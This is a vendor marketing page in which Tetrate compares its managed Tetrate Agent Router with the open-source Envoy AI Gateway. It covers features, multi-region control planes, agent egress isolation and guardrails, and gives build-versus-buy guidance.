Tetrate Agent Router vs. Envoy AI Gateway: Build vs. Buy — From the Creators
Last updated: June 2026
TL;DR
Envoy AI Gateway is a fast-maturing open-source project — v0.6.0 (May 2026) reached its first production-stable API surface (v1beta1), with fine-grained MCP authorization, CEL-based auth, multi-provider support, and body redaction. It is the right foundation if your team has Kubernetes depth and the bandwidth to operate it. Tetrate Agent Router is that same data plane productized: managed operations, admin UX, authenticated identity, per-team attribution, guardrails, SSO, and audit — built and run by the people who co-created the project.
Note: the guardrails subsystem — PII/PHI redaction, regex and SLM-powered content enforcement, third-party integrations (AWS Bedrock Guardrails, Azure Content Safety, NVIDIA NeMo), and custom webhook guardrails — is not included in the open-source project. It is an enterprise-only capability.
Why this comparison is unique
Tetrate doesn’t just integrate with Envoy AI Gateway — Tetrate co-created it, with Bloomberg, and maintains it as part of the Envoy ecosystem. That means this page isn’t a vendor comparing against a third-party project; it is the team behind the project explaining when the OSS version is the right choice vs. when you should use the operated product built on top of it.
We will give you the honest answer.
What each option is
Envoy AI Gateway (OSS) is a Cloud Native Computing Foundation project that extends Envoy Gateway for AI/LLM use cases. As of v0.6.0 (May 2026) it includes: multi-provider routing (OpenAI, Anthropic, AWS Bedrock, Gemini, Vertex AI), OpenAI-compatible API translation, token-based rate limiting, fine-grained MCP authorization with CEL policies, OAuth authentication for MCP, prompt caching, body redaction, intelligent inference routing (InferencePool), and native OpenTelemetry observability. The v1beta1 API graduation means core CRDs are now stable. It runs on Kubernetes. You operate it.
Tetrate Agent Router is that same data plane, delivered as a product: managed operations, an admin UX, authenticated identity on every request, per-team cost attribution with showback/chargeback, MCP tool governance, runtime guardrails, SSO, immutable audit logs, enterprise SLA, and forward-deployed Tetrate engineers. Enterprise tier adds data-plane placement options (VPC, on-premises, edge, per-region) under a Tetrate-managed control plane.
Same foundation. Rapidly maturing OSS on one side. Fully operated, governed product on the other.
Head-to-head comparison
| Envoy AI Gateway (OSS) | Tetrate Agent Router | |
|---|---|---|
| API stability | v1beta1 as of v0.6.0 (May 2026) — production-ready core CRDs | GA product |
| Who operates it | Your team — K8s, upgrades, CVE patches, observability | Tetrate (managed) or jointly supported (Enterprise) |
| Distributed deployment | Single K8s cluster you deploy and operate; multi-cluster requires your own automation | Tetrate-managed control plane + data planes in VPC/on-prem/per-region/edge |
| Admin UX | Build your own or use raw K8s tooling | Included |
| MCP support | Yes — fine-grained CEL authorization, OAuth, MCP Stdio servers, per-backend header forwarding | Native: curated catalog, MCP profiles, OAuth + API-key auth |
| MCP Profiles / least-privilege | Not included; build access scoping yourself | Per-agent MCP Profiles: restrict to specific tool subsets, reduce context window usage, prevent automatic exposure of new upstream tools |
| Identity / auth | CEL-based auth policies; integrate SSO yourself | Authenticated identity bound to every request; SSO included |
| Cost attribution | Token rate limiting; build attribution yourself | Per-person / team / agent / project; showback + chargeback |
| Runtime guardrails | Body redaction (v0.6.0); build other integrations yourself | Regex guardrails, SLM-powered PII/PHI redaction (with ~100ms latency trade-off), third-party integrations (AWS Bedrock Guardrails, Azure Content Safety, NVIDIA NeMo), custom webhook/DLP integration; monitor / block / redact actions; full OTEL trace correlation across guardrail events |
| Audit / compliance | Build your own | Immutable audit logs; EU AI Act-grade |
| SLA / support | Community (GitHub, Slack, Monday community meetings) | Enterprise SLA; forward-deployed Tetrate engineers |
| CVE remediation | Your team tracks and patches | Tetrate-managed |
| Project maintained by | Envoy community, incl. Tetrate | The co-creators of the project |
One control plane, distributed data planes
This is where the build-vs-buy gap widens most. Self-hosting Envoy AI Gateway gives you one Kubernetes cluster you operate. Scaling to multi-region or multi-cloud means running and coordinating multiple clusters yourself — your team’s responsibility to automate, synchronize, and govern.
Tetrate Agent Router Enterprise runs a fundamentally different topology: one Tetrate-managed control plane governing distributed data planes deployed wherever your agents run — across multiple cloud VPCs (AWS, Azure, GCP), on-premises, at the edge, or per-region with localized model catalogs, region-specific guardrails, and data controls. Each data plane enforces the right policy for its environment; the control plane ensures consistency across all of them without duplicating logic in each application.
This matters most when your platform team is small relative to the number of teams or agents they serve. Self-managing a fleet of Envoy AI Gateway instances means replicating policy configuration, guardrail rules, and catalog updates across each one — your team’s automation to build and maintain. The Tetrate control plane centralizes that: one place to set which models are approved, which MCP servers are reachable, which guardrail rules apply, with those policies automatically distributed to every data plane in the fleet. A small IAM or platform team can govern a large population of developers and agents at scale without manually tracking each gateway instance. A concrete example: if your agents run across both Azure and AWS, you may want to apply Azure Content Safety at your Azure data planes and AWS Bedrock Guardrails at your AWS data planes — or you may want Azure Content Safety applied uniformly everywhere regardless of cloud. That orchestration is managed from one control plane rather than configured redundantly per cluster.
For enterprises running agents across multiple teams, geographies, or regulatory jurisdictions — a financial services firm with EU and US data planes, a retailer deploying edge inference per service area — this is the architectural capability that a self-hosted single-cluster model does not provide without significant build work. It is also the capability most grounded in Tetrate’s core lineage: the same distributed systems architecture Tetrate builds and runs for Envoy at enterprise scale.
Agent isolation in Kubernetes
A common enterprise requirement — especially for platform teams operationalizing agents — is not just routing agent traffic but constraining what agents can reach. The pattern: deploy agents into a dedicated Kubernetes namespace or cluster, enforce a network policy that allows only egress through the Agent Router data plane, and configure the catalog to expose only approved LLM endpoints and MCP servers. Agents cannot reach arbitrary external URLs directly.
This gives you a hard enforcement boundary: an agent that attempts to call an unapproved endpoint — whether by design, by prompt injection, or by an LLM-generated tool call — is blocked at the network layer before the request leaves the cluster.
The trickier case is brownfield: existing applications that are becoming agentic. If a legacy service depends on third-party APIs that you cannot immediately block, a transition approach is to run the Agent Router as a transparent proxy first — collecting telemetry on which routes are actually called — and then build the allow list incrementally, tightening the policy over time rather than blocking everything on day one.
Guardrails add a second enforcement layer on top of network policy: because Agent Router sits inline on both LLM requests and MCP calls, it can inspect the LLM’s output for patterns — a URL appearing in a tool-call instruction, a domain name in a response — and block or flag before the downstream call is made. Network policy enforces where traffic can go; guardrails enforce what the LLM is being instructed to do.
The integration problem: why unified telemetry matters
Many organizations approach AI infrastructure the same way they approached microservices a decade ago: different teams build an LLM gateway, an MCP gateway, and a developer portal independently — loosely integrated or not integrated at all. The result is three systems that each have partial visibility.
When Agent Router sits inline on both LLM traffic and MCP/tool-call traffic, it becomes possible to correlate across them. A concrete example: if the LLM’s output contains a URL, and within milliseconds that same URL appears as an outbound network call through the gateway, you can determine whether that call was initiated by normal application code or was an LLM-generated instruction. That distinction — code-path call versus LLM-instructed call — is not detectable if your inference gateway and your egress gateway are separate systems with separate logs.
This is where audit logs, OTEL trace correlation IDs, and guardrails all connect: a guardrail event, a routing decision, and an MCP tool call can be traced back to the same originating LLM request. A decoupled stack cannot provide this view without building a custom data pipeline to join the logs.
The honest build vs. buy calculus
Envoy AI Gateway is maturing quickly — the v1beta1 graduation is a meaningful milestone. Self-hosting is increasingly viable for teams with the right skills. Here is an honest framework for deciding.
Self-hosting Envoy AI Gateway is the right choice when:
- You have strong Envoy and Kubernetes operational expertise on your platform team.
- You want full control, no licensing cost, and the flexibility to extend via the CNCF ecosystem.
- Your governance and attribution needs are modest, or you are prepared to build them on top of the OSS primitives (CEL auth, body redaction, token rate limiting).
- You want to contribute to and shape the open-source project directly.
- You are comfortable operating at v1beta1 stability and tracking the release cadence yourself.
Tetrate Agent Router is the right choice when:
- You want your engineers shipping agents, not operating gateway infrastructure.
- You need org-wide governance — per-team attribution, showback/chargeback, identity on every request — without building it yourself on top of OSS primitives.
- You need to enforce hard egress boundaries for agents running in Kubernetes — restricting reachable LLM endpoints and MCP servers at the network layer, not just at the application layer.
- You need to correlate LLM inference traffic with downstream MCP and tool-call traffic for security auditing — detecting LLM-generated instructions that attempt to reach unapproved endpoints.
- You need an enterprise SLA, compliance evidence, and data-residency control.
- You want the same team that maintains the open-source project to run your production gateway.
Choose self-hosted Envoy AI Gateway when
- Your platform team has Envoy/K8s depth and wants full control over the data plane.
- You have operational capacity for upgrades, CVE tracking, and observability build-out.
- OSS community support (GitHub, Slack, Monday community meetings) is sufficient.
- You intend to contribute to or deeply customize the project.
Choose Tetrate Agent Router when
- You want the Envoy AI Gateway foundation without the operational burden.
- You need to run distributed data planes across multiple regions, VPCs, or on-prem environments — governed from one control plane, without building the multi-cluster automation yourself.
- Governance, attribution, identity, and audit are requirements today, not future roadmap items.
- You need an enterprise SLA, compliance evidence, and data-residency control.
- You want to accelerate: ship agents in weeks, not build platform infrastructure for months.
Now Available
Frequently asked questions
Is Tetrate Agent Router just Envoy AI Gateway with a UI? No — the UI is one component. Tetrate Agent Router adds managed operations, authenticated identity on every request, per-team cost attribution with showback/chargeback, MCP tool governance, runtime guardrails, SSO, immutable audit logs, enterprise SLA, forward-deployed engineers, and CVE-managed builds. The OSS project (v0.6.0) has body redaction and CEL-based auth — Tetrate Agent Router packages and operates those capabilities and adds the full governance layer on top.
Can I start with OSS Envoy AI Gateway and migrate to Tetrate Agent Router later? Yes — the shared data-plane foundation makes this a natural path. Your routing config, provider integrations, and Envoy expertise all carry over. Reach out to Tetrate’s forward-deployed engineers to plan a migration.
Does Tetrate Agent Router support self-service access for individual developers and application teams? Yes. There are two tiers of access. Administrators configure the top-level policy: which LLM models are in the approved catalog, which MCP servers are reachable, which guardrail rules apply globally. Within those bounds, individual developers and application teams can self-service: provision their own API keys, create MCP Profiles that restrict their agents to a specific subset of the allowed tools, set per-agent rate limits, and configure fallback policies. Platform teams can serve a large population of developers without manually reviewing each agent’s tool access.
Does the guardrails system require sending data to an external API? It depends on which guardrail type you use. Regex-based guardrails and SLM-powered guardrails (PII/PHI redaction) run inline at the data plane — in your network, with no external API call. Third-party guardrail integrations (AWS Bedrock Guardrails, Azure Content Safety, NVIDIA NeMo) make an API call to the respective external service before the routing decision. Custom webhook guardrails call your own endpoint. You can mix: run SLM-based guardrails everywhere with low latency overhead (~100ms), and reserve third-party integrations for specific high-sensitivity gateways.
We already have a homegrown LLM gateway. Do we have to rip and replace to adopt Tetrate Agent Router? No. A layering approach works well: deploy Tetrate Agent Router behind your existing gateway to add controls, observability, and guardrails — then retire the homegrown components incrementally as you build confidence. This gives you an existing inventory of what needs to transition, which typically makes the migration easier than starting from scratch. Bloomberg used a similar pattern when they outgrew their internal LLM proxy and adopted Envoy AI Gateway.
Does Tetrate contribute back to the Envoy AI Gateway project? Yes. Tetrate is a primary maintainer. Using Tetrate Agent Router supports ongoing development of the OSS project.
What if I need FIPS-compliant builds? Tetrate Enterprise Gateway for Envoy (TEG) provides FIPS-verified, CVE-protected builds. Ask about the full Tetrate product line for compliance-sensitive environments.
Compare other gateways: vs. Portkey · vs. Kong AI Gateway · vs. Bifrost · vs. Cloudflare AI Gateway · vs. LiteLLM
See the full 2026 enterprise AI gateway comparison.
MCP Catalog with verified first-party servers, profile-based configuration, and OpenInference observability are now generally available in Tetrate Agent Router Service . Start building production AI agents today.